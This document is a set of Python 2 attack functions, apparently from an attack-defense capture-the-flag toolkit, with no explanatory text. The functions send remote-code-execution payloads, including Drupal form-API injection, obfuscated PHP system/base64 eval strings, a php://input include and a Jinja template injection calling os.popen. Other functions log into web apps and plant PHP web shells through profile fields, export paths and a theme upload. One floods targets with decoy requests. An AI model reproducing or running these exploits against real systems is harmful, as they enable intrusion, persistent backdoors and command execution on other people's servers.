def vulnerable_attack(target, target_port, cmd): ''' this is the payload script for vuln: eval($_POST[333]); assert($_POST[333]); ''' try: #cmd = base64.b64encode(cmd) # This payload may not work under some php versions #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd #print payload #payload = "call_user_func('sy'.'stem',call_user_func('bas'.'e64_dec'.'ode','%s'));"%cmd payload = cmd data = 'form_id=user_register_form&mail[0][#lazy_builder][0]=system&mail[#type]=markup&mail[0][#lazy_builder][1][0]=%s' % quote( payload) res = http( "post", target, target_port, "/user/register?element_parents=account/mail/%23value&ajax_form=1", data, headers) except Exception, e: debug_print(traceback.format_exc()) dump_error("attack failed", target, "vulnerable attack") res = "error"
def shit(target, target_port, cmd): s = requests.Session() ip = target shellhash = hashlib.md5(str(time.time())).hexdigest() url = 'http://%s:%s/web/login' % (ip, str(target_port)) url_2 = 'http://%s:%s/web/login_check' % (ip, str(target_port)) url_3 = 'http://%s:%s/web/' % (ip, str(target_port)) url_4 = 'http://%s:%s/web/settings/' % (ip, str(target_port)) url_5 = 'http://%s:%s/web/logout' % (ip, str(target_port)) url_6 = 'http://%s:%s/web/admin/order/manage/export/course?loop=s&start=0&fileName=/var/www/html/web/files/%s.php' % ( ip, str(target_port), shellhash) url_7 = 'http://%s:%s/web/register/submited/1/ae797a91d0493acb27050b05c884a4ae' % ( ip, str(target_port)) ''' url = 'http://%s:%s/login' % (ip,str(target_port)) url_2 = 'http://%s:%s/login_check' %(ip,str(target_port)) url_3 = 'http://%s:%s/' %(ip,str(target_port)) url_4 = 'http://%s:%s/settings/' % (ip,str(target_port)) url_5 = 'http://%s:%s/logout' % (ip,str(target_port)) url_6 = 'http://%s:%s/admin/order/manage/export/course?loop=s&start=0&fileName=/var/www/html/web/files/%s.php' % (ip,str(target_port),shellhash) url_7 = 'http://%s:%s/register/submited/1/ae797a91d0493acb27050b05c884a4ae' % (ip,str(target_port)) ''' # user login content = s.get(url).content index_1 = content.find('<meta name="description"') index_2 = content.find('name="csrf-token"/>') token = content[index_1 + 35 + len('<meta name="description"'):index_2 - 2] debug_print(token) s.post(url_2, data={ '_username': '******', '_password': '******', '_csrf_token': '%s' % token }) s.get(url_3) # user shell shell = '<?php eval($_POST[2222]);?>' s.post(url_4, data={ 'profile[truename]': '%s' % shell, '_csrf_token': '%s' % token }) s.get(url_5) # admin login s.get(url_7) s.get(url_6, allow_redirects=False) payload = "system('%s');" % cmd data = '2222=%s' % quote(payload) res = http("post", target, target_port, "/web/files/%s.php" % shellhash, data, headers) print res return res
def send(hosts, msgs): #here are your targets #for i in xrange(0,5): while True: tmp_file = open("./data/ua.data", "rb") rd = tmp_file.readlines() headers['User-Agent'] = rd[random.randint(0, len(rd) - 1)].strip() tmp_file.close() rnds = random.randint(0, 6) if headers.has_key('Hacked by'): headers.pop('Hacked by') if rnds == 0: headers['Hacked by'] = "Redbud" headers['Accept-Language'] = ac_lang[random.randint( 0, len(ac_lang) - 1)] #print headers#['User-Agent'] contents = msgs[random.randint(0, len(msgs) - 1)].strip() if not contents: continue contents = contents.split("*---craso---*") if len(contents) < 2: continue for host in hosts: ip, port = host[:-1].split(":") try: print contents[0] + " " + ip + ":" + port + contents[ 1] + "?" + contents[2].format(crasolee_para=quote(trash()), crasolee_para0=para_key()) if contents[0] == 'get' or contents[0] == 'GET': tmp = http( contents[0], ip, int(port), contents[1] + "?" + contents[2].format(crasolee_para=quote(trash()), crasolee_para0=para_key()), '', headers) else: tmp = http( contents[0], ip, int(port), contents[1], contents[2].format(crasolee_para=quote(trash()), crasolee_para0=para_key()), headers) except Exception, e: print e time.sleep(1)
def shit(target, target_port, cmd): s = requests.Session() ip = target shellhash = hashlib.md5(str(time.time())).hexdigest() url = 'http://%s:%s/app.php/login' % (ip, str(target_port)) url_2 = 'http://%s:%s/app.php/login_check' % (ip, str(target_port)) url_3 = 'http://%s:%s/app.php/' % (ip, str(target_port)) url_4 = 'http://%s:%s/app.php/settings/' % (ip, str(target_port)) url_5 = 'http://%s:%s/app.php/logout' % (ip, str(target_port)) url_6 = 'http://%s:%s/app.php/course_set/1/manage/course/1/manage/student/export/datas?fileName=/var/www/html/web/files/tmp/%s.php' % ( ip, str(target_port), shellhash) content = s.get(url).content index_1 = content.find('<meta name="description"') index_2 = content.find('name="csrf-token"/>') token = content[index_1 + 35 + len('<meta name="description"'):index_2 - 2] debug_print(token) s.post(url_2, data={ '_username': '******', '_password': '******', '_csrf_token': '%s' % token }) s.get(url_3) shell = '<?php eval($_POST[2222]);?>' s.post(url_4, data={ 'profile[job]': '%s' % shell, '_csrf_token': '%s' % token }) s.get(url_5) content = s.get(url).content index_1 = content.find('<meta name="description"') index_2 = content.find('name="csrf-token"/>') token = content[index_1 + 35 + len('<meta name="description"'):index_2 - 2] debug_print(token) s.post(url_2, data={ '_username': '******', '_password': '******', '_csrf_token': '%s' % token }) s.get(url_6) payload = "system('%s');" % cmd data = '2222=%s' % quote(payload) res = http("post", target, target_port, "/files/tmp/%s.php" % shellhash, data, headers) print res return res
def waf_check(target, target_port): url = 'http://%s:%d%s' % (target, int(target_port), url_label) r = requests.post(url, timeout=timeout, headers={"Accept-Encoding": "aasas"}) res1 = r.text res2 = http('post', target, int(target_port), url_label + '?' + get_payload, post_payload, {}) res2 = res2.decode('utf-8') if res1 == res2: print '|url__ok_|', return True print '|url_fail|', return False
def vulnerable_attack(target, target_port, cmd): ''' this is the payload script for vuln: /admin.php?action=themeinstall ''' try: # This payload may not work under some php versions #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd #print payload s = requests.session() url_1 = "http://%s:%d/login.php" % (target, int(target_port)) url_2 = "http://%s:%d/admin.php?action=themeinstall" % ( target, int(target_port)) my_hash = random_string() s.post(url_1, data="cont1=123456789&bogus=&submit=Log+in", headers={ "Accept-Encoding": "identity", "Content-Type": "application/x-www-form-urlencoded" }) shell_content = "<?php system($_REQUEST['%s']);?>" % my_hash file_name = my_hash + ".php" tar_name = my_hash + ".tar.gz" open('/tmp/%s' % file_name, 'w').write(shell_content) res = os.popen('cd /tmp;tar cvfz %s %s' % (tar_name, file_name)).read() debug_print(res) data = {"submit": "Upload"} files = {"sendfile": open("/tmp/" + tar_name, 'rb')} s.post(url_2, data=data, files=files, headers={"Accept-Encoding": "identity"}) res = os.popen('rm /tmp/%s /tmp/%s' % (file_name, tar_name)).read() debug_print(res) data = '%s=%s' % (my_hash, quote(cmd)) res = http("post", target, target_port, "/data/themes/%s" % (file_name), data, headers=headers) except Exception, e: debug_print(traceback.format_exc()) dump_error("attack failed", target, "vulnerable attack") res = "error"
def vulnerable_attack(target, target_port, cmd): ''' this is the payload script for vuln: eval($_POST[333]); assert($_POST[333]); ''' try: payload = "/link?url=file:///flag" res = http("get", target, target_port, payload, "", headers) res = cmd_prefix + str(res) + cmd_postfix except Exception, e: debug_print(traceback.format_exc()) dump_error("attack failed", target, "vulnerable attack") res = "error"
def vulnerable_attack(target, target_port, cmd): ''' this is the payload script for vuln: eval($_POST[222]); ''' try: cmd = base64.b64encode(cmd) payload = "$a='sy'.'stem';$b = '%s';$a(base64_decode($b));" % cmd data = '222=%s' % quote(payload) res = http("post", target, target_port, "/index.php", data, headers) except Exception, e: debug_print(traceback.format_exc()) dump_error("attack failed", target, "vulnerable attack") res = "error"
def vulnerable_attack(target, target_port, cmd): ''' this is the payload script for vuln: include "php://input"; ''' try: cmd = urllib.unquote(cmd) cmd = base64.b64encode(cmd) data = "<?php $a='sy'.'stem';$b = '%s';$a(base64_decode($b));?>" % cmd res = http("post", target, target_port, "/index.php?f=a", data, headers) except Exception, e: debug_print(traceback.format_exc()) dump_error("attack failed", target, "vulnerable attack") res = "error"
def vulnerable_attack(target, target_port, cmd): ''' this is the payload script for vuln: eval($_POST[333]); assert($_POST[333]); ''' try: payload = "/{{().__class__.__bases__.0.__subclasses__().59.__init__.__globals__.linecache.os.popen(\"" + cmd + "\").read()}}" res = http("get", target, target_port, payload, "", headers) before = "<h1>URL " after = " not found</h1><br/>" s = res[res.find(before) + len(before):res.find(after)] res = s except Exception, e: debug_print(traceback.format_exc()) dump_error("attack failed", target, "vulnerable attack") res = "error"
def vulnerable_attack(target, target_port, cmd): ''' this is the payload script for vuln: eval($_POST[333]); assert($_POST[333]); ''' try: #cmd = base64.b64encode(cmd) # This payload may not work under some php versions #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd #print payload data = 'haozigege=%s' % quote(cmd) res = http("post", target, target_port, "/charpter2-1.0-SNAPSHOT/1.jsp", data, headers) except Exception, e: debug_print(traceback.format_exc()) dump_error("attack failed", target, "vulnerable attack") res = "error"
def vulnerable_attack(target, target_port, cmd): ''' this is the payload script for vuln: eval($_POST[333]); assert($_POST[333]); ''' try: cmd = base64.b64encode(cmd) # This payload may not work under some php versions #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd #print payload payload = "call_user_func('sy'.'stem',call_user_func('bas'.'e64_dec'.'ode','%s'));" % cmd data = '222=%s' % quote(payload) res = http("post", target, target_port, "/1.php", data, headers) except Exception, e: debug_print(traceback.format_exc()) dump_error("attack failed", target, "vulnerable attack") res = "error"
def vulnerable_attack(target, target_port, cmd): ''' this is the payload script for vuln: eval($_POST[333]); assert($_POST[333]); ''' try: #cmd = base64.b64encode(cmd) # This payload may not work under some php versions #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd #print payload res = http( "get", target, target_port, "/index.php/index/index/?back1=system&back2=%s" % quote(cmd), "", headers) except Exception, e: debug_print(traceback.format_exc()) dump_error("attack failed", target, "vulnerable attack") res = "error"
def vulnerable_attack(target,target_port,cmd): ''' this is the payload script for vuln: eval($_POST[333]); assert($_POST[333]); ''' try: cmd = base64.b64encode(cmd) # This payload may not work under some php versions #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd #print payload data = 'cmd=%s'% (flag_path) headers['Cookie'] = data headers['X-Forwarded-For'] = '8.8.8.8' res = http("post",target,target_port,"/index.php/admin/login/backdoor?hongkexueyuan=highlight_file",data,headers) except Exception,e: debug_print(traceback.format_exc()) dump_error("attack failed",target,"vulnerable attack") res = "error"